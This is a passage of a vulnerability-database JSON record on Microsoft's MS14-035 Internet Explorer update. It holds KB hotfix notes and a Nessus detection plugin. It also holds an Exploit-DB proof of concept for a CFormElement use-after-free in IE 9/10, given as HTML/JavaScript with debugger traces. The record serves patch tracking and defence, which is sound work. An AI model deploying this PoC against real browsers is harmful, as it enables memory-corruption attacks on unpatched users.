class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-NLD.exe</td><td class=\"sbody-td\">AC170EFD5BD2E123AA06A4C19F96385D29504BF8</td><td class=\"sbody-td\">7168790D32FCBC278940268AEB60CADA36F4272F1431E02B5698B18B9132657D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-NOR.exe</td><td class=\"sbody-td\">EBC9EEF897E48E5CA902CE86F152A1770A75C463</td><td class=\"sbody-td\">5D6BE836D6BE474D50CE202971149F45DA6B34D4B2267E214EA001054BE2D712</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-PLK.exe</td><td class=\"sbody-td\">D4C6A3CAB307D41FAB3C6B9E4A64173D5762C0D1</td><td class=\"sbody-td\">8A71C3AE237BEF696A04E1E0CB8AB4AB9147BDFDFA523358D8F1A91A345F7086</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-PTB.exe</td><td class=\"sbody-td\">40B1079D1ED6A04F81D15DC07AD5C38437568BC3</td><td class=\"sbody-td\">627749EF277C43254988CFB6E728AA46445CAE141129CD20263C2D066BC9ED13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-PTG.exe</td><td class=\"sbody-td\">631E7B0D15AA5359586125D423E5AF878E0E5CF6</td><td class=\"sbody-td\">8325145A0C7076B9EFF8293E729211969F88086A6DCA422F9245C6FC23041633</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-RUS.exe</td><td class=\"sbody-td\">ACB8BF223047DC91F601F7184174B7783449E7B1</td><td class=\"sbody-td\">A59D280CF92BC6B98225892B19A9B4D2244CBE095A76906BF397DB2FB888E1A3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-SVE.exe</td><td class=\"sbody-td\">18F53579B752278B82C9DEEAB26BD898F16E39AB</td><td class=\"sbody-td\">74797926FC09C9EE3C47EA7F46D8189BC125EDB32B074CEAFB99F24749A4AC69</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2957689-x86-Embedded-TRK.exe</td><td class=\"sbody-td\">0BEBC105B1302BBE088DDAFC2066A6043E14A1F1</td><td class=\"sbody-td\">96271C7A712896C35AD5107EFAB573773BED6B7A3247DA4B87F14CF639C6DF6D</td></tr></table></div></div><br/></span></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Additional information about hotfix files</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Security update 2969262 packages for Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2969262 installs the GDR files.\u00a0<br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems.\u00a0<br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes.\u00a0<span> For more information about how to install the hotfixes that are included in security update 2969262, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-48\">897225 </a> How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span>\u00a0In addition to installing hotfix files, you should review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry change that has to be made to enable that specific hotfix.\u00a0<br/><br/><span> For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-49\">824994 </a> Description of the contents of Windows Server 2003 software update packages </div></span></div><br/></span></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to determine whether you are running a 32-bit or a 64-bit edition of Windows</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">If you are not sure which version of Windows that you are running or whether it is a 32-bit version or 64-bit version, open System Information (Msinfo32.exe), and review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:<br/><ol class=\"sbody-num_list\"><li>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>.</li><li>Type <strong class=\"uiterm\">msinfo32.exe</strong> and then press ENTER.</li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<br/><ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>. </li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>.</li></ul></li></ol><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-50\">827218 </a>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system</div></span></div><br/></span></div></div></div></div></body></html>", "edition": 2, "modified": "2014-10-27T08:13:27", "id": "KB2969262", "href": "https://support.microsoft.com/en-us/help/2969262/", "published": "2014-06-10T00:00:00", "title": "MS14-035: Cumulative security update for Internet Explorer: June 10, 2014", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:40", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2969262.\n\nThe version of Internet Explorer installed on the remote host is\naffected by multiple vulnerabilities, the majority of which are remote\ncode execution vulnerabilities. An attacker could exploit these\nvulnerabilities by convincing a user to visit a specially crafted web\npage.", "edition": 28, "published": "2014-06-11T00:00:00", "title": "MS14-035: Cumulative Security Update for Internet Explorer (2969262)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1802", "CVE-2014-1762", "CVE-2014-1773", "CVE-2014-1804", "CVE-2014-1790", "CVE-2014-1775", "CVE-2014-2761", "CVE-2014-1796", "CVE-2014-2782", "CVE-2014-1786", "CVE-2014-1797", "CVE-2014-2760", "CVE-2014-1794", "CVE-2014-2757", "CVE-2014-2766", "CVE-2014-2776", "CVE-2014-1772", "CVE-2014-2754", "CVE-2014-2758", "CVE-2014-1784", "CVE-2014-2753", "CVE-2014-2771", "CVE-2014-1785", "CVE-2014-1803", "CVE-2014-1770", "CVE-2014-2777", "CVE-2014-0282", "CVE-2014-1789", "CVE-2014-1764", "CVE-2014-2756", "CVE-2014-1799", "CVE-2014-2772", "CVE-2014-1782", "CVE-2014-1766", "CVE-2014-2765", "CVE-2014-2767", "CVE-2014-1783", "CVE-2014-1800", "CVE-2014-2755", "CVE-2014-1780", "CVE-2014-1795", "CVE-2014-1792", "CVE-2014-1791", "CVE-2014-2763", "CVE-2014-2759", "CVE-2014-2768", "CVE-2014-1788", "CVE-2014-2775", "CVE-2014-2770", "CVE-2014-2769", "CVE-2014-1777", "CVE-2014-1778", "CVE-2014-2773", "CVE-2014-1771", "CVE-2014-1781", "CVE-2014-2764", "CVE-2014-1774", "CVE-2014-1805", "CVE-2014-1779", "CVE-2014-1769"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS14-035.NASL", "href": "https://www.tenable.com/plugins/nessus/74427", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74427);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0282\",\n \"CVE-2014-1762\",\n \"CVE-2014-1764\",\n \"CVE-2014-1766\",\n \"CVE-2014-1769\",\n \"CVE-2014-1770\",\n \"CVE-2014-1771\",\n \"CVE-2014-1772\",\n \"CVE-2014-1773\",\n \"CVE-2014-1774\",\n \"CVE-2014-1775\",\n \"CVE-2014-1777\",\n \"CVE-2014-1778\",\n \"CVE-2014-1779\",\n \"CVE-2014-1780\",\n \"CVE-2014-1781\",\n \"CVE-2014-1782\",\n \"CVE-2014-1783\",\n \"CVE-2014-1784\",\n \"CVE-2014-1785\",\n \"CVE-2014-1786\",\n \"CVE-2014-1788\",\n \"CVE-2014-1789\",\n \"CVE-2014-1790\",\n \"CVE-2014-1791\",\n \"CVE-2014-1792\",\n \"CVE-2014-1794\",\n \"CVE-2014-1795\",\n \"CVE-2014-1796\",\n \"CVE-2014-1797\",\n \"CVE-2014-1799\",\n \"CVE-2014-1800\",\n \"CVE-2014-1802\",\n \"CVE-2014-1803\",\n \"CVE-2014-1804\",\n \"CVE-2014-1805\",\n \"CVE-2014-2753\",\n \"CVE-2014-2754\",\n \"CVE-2014-2755\",\n \"CVE-2014-2756\",\n \"CVE-2014-2757\",\n \"CVE-2014-2758\",\n \"CVE-2014-2759\",\n \"CVE-2014-2760\",\n \"CVE-2014-2761\",\n \"CVE-2014-2763\",\n \"CVE-2014-2764\",\n \"CVE-2014-2765\",\n \"CVE-2014-2766\",\n \"CVE-2014-2767\",\n \"CVE-2014-2768\",\n \"CVE-2014-2769\",\n \"CVE-2014-2770\",\n \"CVE-2014-2771\",\n \"CVE-2014-2772\",\n \"CVE-2014-2773\",\n \"CVE-2014-2775\",\n \"CVE-2014-2776\",\n \"CVE-2014-2777\",\n \"CVE-2014-2782\"\n );\n script_bugtraq_id(\n 67295,\n 67511,\n 67518,\n 67544,\n 67827,\n 67831,\n 67833,\n 67834,\n 67835,\n 67836,\n 67838,\n 67839,\n 67840,\n 67841,\n 67842,\n 67843,\n 67845,\n 67846,\n 67847,\n 67848,\n 67849,\n 67850,\n 67851,\n 67852,\n 67854,\n 67855,\n 67856,\n 67857,\n 67858,\n 67859,\n 67860,\n 67861,\n 67862,\n 67864,\n 67866,\n 67867,\n 67869,\n 67871,\n 67873,\n 67874,\n 67875,\n 67876,\n 67877,\n 67878,\n 67879,\n 67880,\n 67881,\n 67882,\n 67883,\n 67884,\n 67885,\n 67886,\n 67887,\n 67889,\n 67890,\n 67891,\n 67892,\n 67915,\n 68101\n );\n script_xref(name:\"CERT\", value:\"239151\");\n script_xref(name:\"EDB-ID\", value:\"33860\");\n script_xref(name:\"EDB-ID\", value:\"35213\");\n script_xref(name:\"MSFT\", value:\"MS14-035\");\n script_xref(name:\"MSKB\", value:\"2957689\");\n script_xref(name:\"MSKB\", value:\"2963950\");\n\n script_name(english:\"MS14-035: Cumulative Security Update for Internet Explorer (2969262)\");\n script_summary(english:\"Checks version of Mshtml.dll.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web browser that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2969262.\n\nThe version of Internet Explorer installed on the remote host is\naffected by multiple vulnerabilities, the majority of which are remote\ncode execution vulnerabilities. An attacker could exploit these\nvulnerabilities by convincing a user to visit a specially crafted web\npage.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-035\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/532798/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/532799/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-194/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-193/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-192/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-191/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-190/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-189/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-188/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-187/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-186/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-185/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-184/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-183/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-182/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-181/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-180/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-179/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-178/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-177/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-176/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-175/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-174/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-14-140/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Internet Explorer 6, 7, 8,\n9, 10, and 11.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-1764\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS14-035';\nkb = '2957689';\n\nkbs = make_list(kb, '2963950');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / 2012 R2\n #\n # - Internet Explorer 11 with KB2919355 applied\n hotfix_is_vulnerable(os:\"6.3\", file:\"Mshtml.dll\", version:\"11.0.9600.17126\", min_version:\"11.0.9600.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 11 without KB2919355 applied\n hotfix_is_vulnerable(os:\"6.3\", file:\"Mshtml.dll\", version:\"11.0.9600.16668\", min_version:\"11.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:'2963950') ||\n\n # Windows 8 / 2012\n #\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.21044\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.2\", file:\"Mshtml.dll\", version:\"10.0.9200.16921\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 7 / 2008 R2\n # - Internet Explorer 11 with KB2929437 applied\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"11.0.9600.17126\", min_version:\"11.0.9600.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 11 without KB2929437 applied\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"11.0.9600.16668\", min_version:\"11.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:'2963950') ||\n # - Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.21044\", min_version:\"10.0.9200.21000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"10.0.9200.16921\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.20666\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"9.0.8112.16555\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22686\", min_version:\"8.0.7601.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18472\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20666\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16555\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23598\", min_version:\"8.0.6001.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19539\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.23389\", min_version:\"7.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.19098\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # Windows 2003\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23598\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21389\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5341\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T20:19:01", "description": "Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035). CVE-2014-0282,CVE-2014-1762,CVE-2014-1764,CVE-2014-1766,...", "published": "2014-07-08T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC MS14-035", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1802", "CVE-2014-1762", "CVE-2014-1773", "CVE-2014-1804", "CVE-2014-1790", "CVE-2014-1775", "CVE-2014-2761", "CVE-2014-1796", "CVE-2014-2782", "CVE-2014-1786", "CVE-2014-1797", "CVE-2014-2760", "CVE-2014-1794", "CVE-2014-2757", "CVE-2014-2766", "CVE-2014-2776", "CVE-2014-1772", "CVE-2014-2754", "CVE-2014-2758", "CVE-2014-1784", "CVE-2014-2753", "CVE-2014-2771", "CVE-2014-1785", "CVE-2014-1803", "CVE-2014-1770", "CVE-2014-2777", "CVE-2014-0282", "CVE-2014-1789", "CVE-2014-1764", "CVE-2014-2756", "CVE-2014-1799", "CVE-2014-2772", "CVE-2014-1782", "CVE-2014-1766", "CVE-2014-2765", "CVE-2014-2767", "CVE-2014-1783", "CVE-2014-1800", "CVE-2014-2755", "CVE-2014-1780", "CVE-2014-1795", "CVE-2014-1792", "CVE-2014-1791", "CVE-2014-2763", "CVE-2014-2759", "CVE-2014-2768", "CVE-2014-1788", "CVE-2014-2775", "CVE-2014-2770", "CVE-2014-2769", "CVE-2014-1777", "CVE-2014-1778", "CVE-2014-2773", "CVE-2014-1771", "CVE-2014-1781", "CVE-2014-2764", "CVE-2014-1774", "CVE-2014-1805", "CVE-2014-1779", "CVE-2014-1769"], "modified": "2014-07-08T00:00:00", "id": "EDB-ID:34010", "href": "https://www.exploit-db.com/exploits/34010/", "sourceData": "<!--\r\nExploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)\r\nProduct: Internet Explorer\r\nVulnerable version: 9,10\r\nDate: 8.07.2014\r\nExploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)\r\nVendor Homepage: http://www.microsoft.com/\r\nTested on: Window 7 SP1 x86 IE 9,10\r\nCVE : unknown\r\n-->\r\n<html>\r\n\r\n<body>\r\n\r\n\r\n<form id=\"form1\">\r\n <input id=\"input1\" type=\"text\" value=\"\">\r\n</form>\r\n\r\n\r\n<script>\r\n\r\n\tloaded = false ;\r\n\r\nfunction func()\t{\r\n\r\n\tif (loaded)\t{\r\n\t\tdocument.body.innerHTML = \"\" ; // free CFormElement\r\n\t}\r\n\r\n}\r\n\r\n \r\n\tinput1 = document.getElementById(\"input1\") ;\r\n\tinput1.onclick = func ;\r\n\tloaded = true ;\r\n\tinput1.click(); // Call DoClick function\r\n\t\r\n\t\r\n\r\n\r\n</script>\r\n</body>\r\n\r\n</html>\r\n<!--\r\nVulnerability details\r\n\r\nMSHTML!CInput::DoClick\r\n\r\n66943670 8bcf mov ecx,edi\r\n66943672 ff751c push dword ptr [ebp+1Ch]\r\n66943675 ff7518 push dword ptr [ebp+18h]\r\n66943678 ff7514 push dword ptr [ebp+14h]\r\n6694367b ff7510 push dword ptr [ebp+10h]\r\n6694367e ff750c push dword ptr [ebp+0Ch]\r\n66943681 ff7508 push dword ptr [ebp+8] <---- esi = CFormElement\r\n66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi\r\n66943689 85db test ebx,ebx \r\n6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695)\r\n6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory\r\n66943691 836668fe and dword ptr [esi+68h],0FFFFFFFEh ; memory corruption, write to freed memory\r\n\r\n MSHTML!CInput::DoClick+0x60:\r\n66943681 ff7508 push dword ptr [ebp+8] ss:0023:023ec994=00000000\r\n0:005> p\r\neax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540\r\neip=66943684 esp=023ec95c ebp=023ec98c iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\r\nMSHTML!CInput::DoClick+0x63:\r\n66943684 e856e4f3ff call MSHTML!CElement::DoClick (66881adf)\r\n0:005> dds esi l1\r\n0034cd20 6661ead8 MSHTML!CFormElement::`vftable'\r\n\r\n\r\n\r\n0:005> !heap -x esi <-- esi contains valid pointer to CFormElement\r\nEntry User Heap Segment Size PrevSize Unused Flags\r\n-----------------------------------------------------------------------------\r\n0034cd18 0034cd20 00270000 002fcee8 78 - c LFH;busy \r\n\r\n0:005> p\r\neax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540\r\neip=66943689 esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\r\nMSHTML!CInput::DoClick+0x68:\r\n66943689 85db test ebx,ebx\r\n0:005> dds esi l1\r\n0034cd20 6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c\r\n\r\n\r\n\r\n\r\n0:005> !heap -x esi <-- esi contains freed pointer to CFormElement\r\nEntry User Heap Segment Size PrevSize Unused Flags\r\n-----------------------------------------------------------------------------\r\n0034cd18 0034cd20 00270000 002fcee8 78 - 0 LFH;free \r\n\r\n0:005> p\r\neax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540\r\neip=6694368b esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\r\nMSHTML!CInput::DoClick+0x6a:\r\n6694368b 7408 je MSHTML!CInput::DoClick+0x74 (66943695) [br=0]\r\n0:005> p\r\neax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540\r\neip=6694368d esp=023ec978 ebp=023ec98c iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\r\nMSHTML!CInput::DoClick+0x6c:\r\n6694368d 83666400 and dword ptr [esi+64h],0 ds:0023:0034cd84=00000001\r\n\r\n\r\n-->", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34010/"}], "kaspersky": [{"lastseen": "2020-09-02T12:02:40", "bulletinFamily": "info", "cvelist": ["CVE-2014-1802", "CVE-2014-1762", "CVE-2014-1773", "CVE-2014-1804", "CVE-2014-1790", "CVE-2014-1775", "CVE-2014-2761", "CVE-2014-1796", "CVE-2014-2782", "CVE-2014-1786", "CVE-2014-1797", "CVE-2014-2760", "CVE-2014-1794", "CVE-2014-2757", "CVE-2014-2766", "CVE-2014-2776", "CVE-2014-1772", "CVE-2014-2754", "CVE-2014-2758", "CVE-2014-1784", "CVE-2014-2753", "CVE-2014-2771", "CVE-2014-1785", "CVE-2014-1803", "CVE-2014-1770", "CVE-2014-2777", "CVE-2014-0282", "CVE-2014-1789", 